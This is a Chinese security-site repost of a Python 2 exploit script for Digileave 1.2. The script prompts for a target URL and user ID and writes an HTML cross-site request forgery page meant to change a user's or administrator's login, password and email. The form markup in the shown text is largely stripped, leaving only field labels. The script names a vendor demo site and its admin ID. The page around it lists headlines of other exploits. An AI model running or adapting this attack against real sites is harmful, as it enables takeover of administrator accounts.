首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Digileave 1.2 - Cross-Site Request Forgery (Update Admin) 来源：http://ihsan.net 作者：Sencan 发布时间：2017-09-19   #!/usr/local/bin/python # # # # # # Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin) # Dork: N/A # Date: 18.09.2017 # Vendor Homepage: http://www.digiappz.com/ # Software Link: http://www.digiappz.com/digileave.asp?id=1 # Demo: http://www.digiappz.com/digileave/login.asp # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # import os import urllib if os.name == 'nt': os.system('cls') else: os.system('clear') def csrfexploit(): e_baslik = ''' ################################################################################ ______ _______ ___ _ __ _____ _______ ___________ _ __ / _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / / / // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ / _/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| / /___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/ WWW.IHSAN.NET ihsan[@]ihsan.net + Digileave 1.2 - CSRF (Update Admin) ################################################################################ ''' print e_baslik url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/digileave: ")) id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8511): ") csrfhtmlcode = ''' User Update Choose Login* Choose Password* First Name* Last Name* Email* ''' %(url, id) print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created." print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n") extension = ".html" name = raw_input(" Filename: ") filename = name+extension file = open(filename, "w") file.write(csrfhtmlcode) file.close() print(" [+] Your exploit is saved as %s")%filename print("") csrfexploit()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Digirez 3.4 - Cross-Site Reque ·DigiAffiliate 1.4 - Cross-Site ·Netdecision 5.8.2 - Local Priv ·Microsoft Windows Kernel - 'wi ·D-Link DIR8xx Routers - Local ·Microsoft Windows Kernel - 'wi ·D-Link DIR8xx Routers - Root R ·Microsoft Windows Kernel - 'nt ·D-Link DIR8xx Routers - Leak C ·Microsoft Windows Kernel - 'wi ·Astaro Security Gateway 7 - Re ·Microsoft Windows Kernel - 'wi   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved